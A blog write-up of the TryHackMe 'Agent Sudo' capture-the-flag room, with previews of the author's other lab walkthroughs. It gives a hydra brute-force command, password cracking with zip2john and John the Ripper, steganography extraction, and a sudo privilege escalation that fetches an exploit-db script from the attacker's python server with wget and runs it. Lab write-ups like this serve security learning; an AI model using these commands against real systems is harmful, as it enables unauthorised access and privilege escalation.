Agent Sudo

 

 Agent Sudo

Firstly, I have to say I'm going to do the Agent Sudo de Tryhackme machine which it's so easy to do.

So let's go to do the following steps:

Now, I'm going to use the nmap toolkit to verify the open service and we can see in the picture below:

  1. port 22: ssh
  2. port 80: http( web page)
  3. port 21: ftp

Here we can observe that the 80 port has a message in the picture below.

I'm going to do the query and we'll have to capture with toolkit from BurpSuite which is incredible, for it I've actived proxy foxy you can discover below:

https://chromewebstore.google.com/detail/foxyproxy/gcknhkkoolaabfmlnjonogaaifnjlfnp?pli=1

 Now, as we have capture the page let's go to do the query where in the User-Agent, we've to write R and click in the option called forward such as you can see in the picture below.

In addition, we can observe in the picture is the Information but it isn't whatever I want such as could be name or password.

Now, we've to do the query in the User-Agent must write C and we've to click in Forward you can see in the picture below, but if you see the second picture below, you'll observe a new user whose name is chris.

In addition, we're going to execute brute force with the hydra toolkit to get the user password from chris you can see in the picture below with this options:

  1. hydra -l (user) chris -P (password dictionary) /usr/share/wordlist/rockyou.txt and ftp service ftp:(//ip/) ftp:/10.10.200.129/ -v( if you can see the things during the scanner)

Right now, I have to connect to ftp service that you can observe in the picture below,so I've executed ls command to obtain the full information.

In addition, we've to use get command and the files which we want to downlod in our tattacker machine such as:

  1. To_AgentJ.txt
  2. cute-alien.jpg
  3. cutie.png

Now, we can observe the process has been successful in the pictures below that in my case are the picture 2 and 5.

Now that we have successfully obtained the files we are going to execute the cat command to be able to see the information of the first file that we have downloaded that we can see in the image below.

Just then, we're going to see the information about the others both files that in my case are 2 pictures is hidden the information, but I've executed the binwalk toolkit which I can be able to see if there's compress in the picture you can see in the picture below with the command binwalk -e cutie.png to can decompress the file zip.

I'm going to run the ls command so I can see the unzipped zip file in the folder named _cutie.png.extracted which we can see in the image below.

Next, I am going to go into the above folder and we can see that there is a zip file named 8702.zip which we will need for later.

Now, I'm going to run toolkit called zip2john which I can be able to extract the passwords after with the toolkit of John the Ripper. So let's go to execute the command which you can observe in the picture below:

  1. zip2john 8702.zip >zip.hash

Now that everything has gone well let's check that it has been converted to a hash file by means of the cat command that we can see in the image below.

To sum up, if we want to get the password files,we'll need to use the toolkit called John the Ripper, and the cammad would be john zip.hash, and we can see in the image below that it has obtained the password and the output file.

Now, as the file is zip, we have to run the 7z command 7z e( extract) 8702.zip and you can see in the picture below.

Finally, if we want to discover the password we have to enter inside with the cat command .txt is To_agent.txt, but as it has been done in 64 base, we have to desencript with the websitesuch such as you can see in this link: https://www.base64decode.org/ that you can see in the both pictures at the bottom of the pages.

Now, as the file is an image we have to execute the command steghide info cute-alien.jpg as we can see in the image below in order to get the information inside the image in an output file which is message.txt.

To finally and discover the password, we've to go to file before called message.txt and will be able to see in the file will be the password and a new user name whose name is james in the picture below.

Now we are going to enter by ssh protocol with the user that we have found and the password and indeed we have entered successfully as we can see in the image below.

Now as we're in the victim machine of Linux we've to find out the both flags such as (user and root),

In my case, I've obtained the user flag whose name is user_flag.txt you can see in the piture below.

To find the root flag, we are going to need to escalate root privileges so first we are going to see the permissions we have, so we have to execute the command sudo -l that we can see in the image below and we can see how we have found the option to escalate privileges which is:

  1. ALL, !root /bin/bash

We're going to search in the Internet in website called exploitdb perhaps it will have the vulnerability in this link https://www.exploit-db.com/exploits/47502 you can see in the both pictures below.


Finally, we will download and ejecute our apache2 service when we're be able to download in comproised machine and run that you can observe in the second and third picture below.

Now, we'll have to execute in our python3 server in the port whatever you want, but in y case has been executed in 8080 port:

  1. python3 -m http.server 8080

Next, we are going to download it on our compromised machine by making a request to our python3 server using this command: wget http://10.2.11.235:8080/'47502(1).py.

 To sum up, we're going to verify if the python file has been downloaded in the copromised machine with this both comands which are:

  1. ls (Listing the files or directorios live)
  2.  chmod +x '47502(1).py ( to change to perms to run the exploit in the compromised machine).

You can see in the both pictures below.

Finally, we have to execute the exploit in the compromised machine as you can see in the picture below, Moreover, we must run the whoami command which I could know if I am a root user you can see in the 2 pictures below.

Finally, we have to find the root flag for this we will use this command which will let me know where the root flag is located which is: find /root/ and we can see that the flag is in that location shown in the second image below and finally the Agent R is DesKel which we can see in the second image below.

Thank you for reading this article

I hope you like it and learned something new

Good hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »